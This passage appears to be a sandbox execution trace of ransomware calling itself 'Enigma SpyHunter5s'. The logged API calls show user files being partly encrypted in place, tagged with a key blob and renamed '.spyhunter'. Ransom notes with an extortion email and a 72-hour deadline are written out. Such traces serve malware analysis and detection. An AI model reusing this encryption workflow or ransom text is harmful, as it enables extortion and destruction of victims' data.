professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.654] WriteFile (in: hFile=0xa0, lpBuffer=0x57edbf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eee8, lpOverlapped=0x0 | out: lpBuffer=0x57edbf*, lpNumberOfBytesWritten=0x57eee8*=0x127, lpOverlapped=0x0) returned 1 [0147.655] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.655] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eee8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eee8*=0x2ac, lpOverlapped=0x0) returned 1 [0147.655] CloseHandle (hObject=0xa0) returned 1 [0147.655] GetProcessHeap () returned 0x2c0000 [0147.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302f598 | out: hHeap=0x2c0000) returned 1 [0147.655] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee88 | out: pbBuffer=0x57ee88) returned 1 [0147.656] GetProcessHeap () returned 0x2c0000 [0147.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.656] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee80*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee80*=0x30) returned 1 [0147.656] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.656] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned 57 [0147.656] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0147.656] GetProcessHeap () returned 0x2c0000 [0147.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.656] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ee44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ee44*=0x11a, lpOverlapped=0x0) returned 1 [0147.657] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffee6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.657] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x57ee44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ee44*=0x11a, lpOverlapped=0x0) returned 1 [0147.657] GetProcessHeap () returned 0x2c0000 [0147.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.657] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.657] WriteFile (in: hFile=0xa0, lpBuffer=0x57ee84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ee44, lpOverlapped=0x0 | out: lpBuffer=0x57ee84*, lpNumberOfBytesWritten=0x57ee44*=0x4, lpOverlapped=0x0) returned 1 [0147.658] WriteFile (in: hFile=0xa0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ee44, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ee44*=0x30, lpOverlapped=0x0) returned 1 [0147.658] CloseHandle (hObject=0xa0) returned 1 [0147.658] GetProcessHeap () returned 0x2c0000 [0147.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.658] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.spyhunter") returned 67 [0147.658] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini.spyhunter")) returned 1 [0147.659] GetProcessHeap () returned 0x2c0000 [0147.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.659] GetProcessHeap () returned 0x2c0000 [0147.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.659] GetProcessHeap () returned 0x2c0000 [0147.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2dff8 | out: hHeap=0x2c0000) returned 1 [0147.659] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee80 | out: pbBuffer=0x57ee80) returned 1 [0147.659] GetProcessHeap () returned 0x2c0000 [0147.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.659] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee78*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee78*=0x30) returned 1 [0147.659] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.659] GetProcessHeap () returned 0x2c0000 [0147.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.659] GetProcessHeap () returned 0x2c0000 [0147.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebfdd0 | out: hHeap=0x2c0000) returned 1 [0147.659] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee80 | out: pbBuffer=0x57ee80) returned 1 [0147.660] GetProcessHeap () returned 0x2c0000 [0147.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.660] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee78*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee78*=0x30) returned 1 [0147.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.660] GetProcessHeap () returned 0x2c0000 [0147.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.660] GetProcessHeap () returned 0x2c0000 [0147.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33e500 | out: hHeap=0x2c0000) returned 1 [0147.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.661] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.661] WriteFile (in: hFile=0xa0, lpBuffer=0x57edaf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eed8, lpOverlapped=0x0 | out: lpBuffer=0x57edaf*, lpNumberOfBytesWritten=0x57eed8*=0x127, lpOverlapped=0x0) returned 1 [0147.662] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.662] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eed8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eed8*=0x2ac, lpOverlapped=0x0) returned 1 [0147.662] CloseHandle (hObject=0xa0) returned 1 [0147.662] GetProcessHeap () returned 0x2c0000 [0147.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2df38 | out: hHeap=0x2c0000) returned 1 [0147.662] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee78 | out: pbBuffer=0x57ee78) returned 1 [0147.662] GetProcessHeap () returned 0x2c0000 [0147.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.662] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee70*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee70*=0x30) returned 1 [0147.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_YuoQttY7j8W.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_yuoqtty7j8w.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.663] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_YuoQttY7j8W.gif") returned 59 [0147.663] StrStrW (lpFirst="_YuoQttY7j8W.gif", lpSrch=".txt") returned 0x0 [0147.663] GetProcessHeap () returned 0x2c0000 [0147.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.663] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ee34, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ee34*=0x2800, lpOverlapped=0x0) returned 1 [0147.664] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.664] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ee34, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ee34*=0x2800, lpOverlapped=0x0) returned 1 [0147.664] GetProcessHeap () returned 0x2c0000 [0147.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.664] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.664] WriteFile (in: hFile=0xa0, lpBuffer=0x57ee74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ee34, lpOverlapped=0x0 | out: lpBuffer=0x57ee74*, lpNumberOfBytesWritten=0x57ee34*=0x4, lpOverlapped=0x0) returned 1 [0147.664] WriteFile (in: hFile=0xa0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ee34, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ee34*=0x30, lpOverlapped=0x0) returned 1 [0147.664] CloseHandle (hObject=0xa0) returned 1 [0147.664] GetProcessHeap () returned 0x2c0000 [0147.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.665] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_YuoQttY7j8W.gif.spyhunter") returned 69 [0147.665] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_YuoQttY7j8W.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_yuoqtty7j8w.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_YuoQttY7j8W.gif.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_yuoqtty7j8w.gif.spyhunter")) returned 1 [0147.665] GetProcessHeap () returned 0x2c0000 [0147.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.665] GetProcessHeap () returned 0x2c0000 [0147.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.665] GetProcessHeap () returned 0x2c0000 [0147.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2de78 | out: hHeap=0x2c0000) returned 1 [0147.666] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee70 | out: pbBuffer=0x57ee70) returned 1 [0147.666] GetProcessHeap () returned 0x2c0000 [0147.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.666] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee68*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee68*=0x30) returned 1 [0147.666] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\V8-o.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\v8-o.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.666] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\V8-o.jpg") returned 51 [0147.666] StrStrW (lpFirst="V8-o.jpg", lpSrch=".txt") returned 0x0 [0147.666] GetProcessHeap () returned 0x2c0000 [0147.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.666] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ee2c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ee2c*=0x2800, lpOverlapped=0x0) returned 1 [0147.668] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.668] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ee2c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ee2c*=0x2800, lpOverlapped=0x0) returned 1 [0147.668] GetProcessHeap () returned 0x2c0000 [0147.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.668] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.668] WriteFile (in: hFile=0xa0, lpBuffer=0x57ee6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ee2c, lpOverlapped=0x0 | out: lpBuffer=0x57ee6c*, lpNumberOfBytesWritten=0x57ee2c*=0x4, lpOverlapped=0x0) returned 1 [0147.668] WriteFile (in: hFile=0xa0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ee2c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ee2c*=0x30, lpOverlapped=0x0) returned 1 [0147.668] CloseHandle (hObject=0xa0) returned 1 [0147.668] GetProcessHeap () returned 0x2c0000 [0147.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.668] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\V8-o.jpg.spyhunter") returned 61 [0147.668] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\V8-o.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\v8-o.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\V8-o.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\v8-o.jpg.spyhunter")) returned 1 [0147.669] GetProcessHeap () returned 0x2c0000 [0147.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.669] GetProcessHeap () returned 0x2c0000 [0147.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.669] GetProcessHeap () returned 0x2c0000 [0147.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebfd20 | out: hHeap=0x2c0000) returned 1 [0147.670] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee70 | out: pbBuffer=0x57ee70) returned 1 [0147.670] GetProcessHeap () returned 0x2c0000 [0147.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.670] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee68*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee68*=0x30) returned 1 [0147.670] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\rfPZ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\rfpz.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.670] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\rfPZ.bmp") returned 51 [0147.670] StrStrW (lpFirst="rfPZ.bmp", lpSrch=".txt") returned 0x0 [0147.670] GetProcessHeap () returned 0x2c0000 [0147.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.671] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ee2c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ee2c*=0x2800, lpOverlapped=0x0) returned 1 [0147.671] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.672] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ee2c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ee2c*=0x2800, lpOverlapped=0x0) returned 1 [0147.672] GetProcessHeap () returned 0x2c0000 [0147.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.672] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.672] WriteFile (in: hFile=0xa0, lpBuffer=0x57ee6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ee2c, lpOverlapped=0x0 | out: lpBuffer=0x57ee6c*, lpNumberOfBytesWritten=0x57ee2c*=0x4, lpOverlapped=0x0) returned 1 [0147.672] WriteFile (in: hFile=0xa0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ee2c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ee2c*=0x30, lpOverlapped=0x0) returned 1 [0147.672] CloseHandle (hObject=0xa0) returned 1 [0147.672] GetProcessHeap () returned 0x2c0000 [0147.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.672] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\rfPZ.bmp.spyhunter") returned 61 [0147.673] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\rfPZ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\rfpz.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\rfPZ.bmp.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\rfpz.bmp.spyhunter")) returned 1 [0147.673] GetProcessHeap () returned 0x2c0000 [0147.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.673] GetProcessHeap () returned 0x2c0000 [0147.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.674] GetProcessHeap () returned 0x2c0000 [0147.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebfc70 | out: hHeap=0x2c0000) returned 1 [0147.674] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee68 | out: pbBuffer=0x57ee68) returned 1 [0147.674] GetProcessHeap () returned 0x2c0000 [0147.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.674] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee60*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee60*=0x30) returned 1 [0147.674] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qiDBt7HPNALY11.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qidbt7hpnaly11.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.675] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qiDBt7HPNALY11.gif") returned 61 [0147.675] StrStrW (lpFirst="qiDBt7HPNALY11.gif", lpSrch=".txt") returned 0x0 [0147.675] GetProcessHeap () returned 0x2c0000 [0147.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.675] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ee24, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ee24*=0x2800, lpOverlapped=0x0) returned 1 [0147.676] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.676] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ee24, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ee24*=0x2800, lpOverlapped=0x0) returned 1 [0147.676] GetProcessHeap () returned 0x2c0000 [0147.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.676] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.676] WriteFile (in: hFile=0xa0, lpBuffer=0x57ee64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ee24, lpOverlapped=0x0 | out: lpBuffer=0x57ee64*, lpNumberOfBytesWritten=0x57ee24*=0x4, lpOverlapped=0x0) returned 1 [0147.676] WriteFile (in: hFile=0xa0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ee24, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ee24*=0x30, lpOverlapped=0x0) returned 1 [0147.676] CloseHandle (hObject=0xa0) returned 1 [0147.677] GetProcessHeap () returned 0x2c0000 [0147.677] RtlAllocateHeap 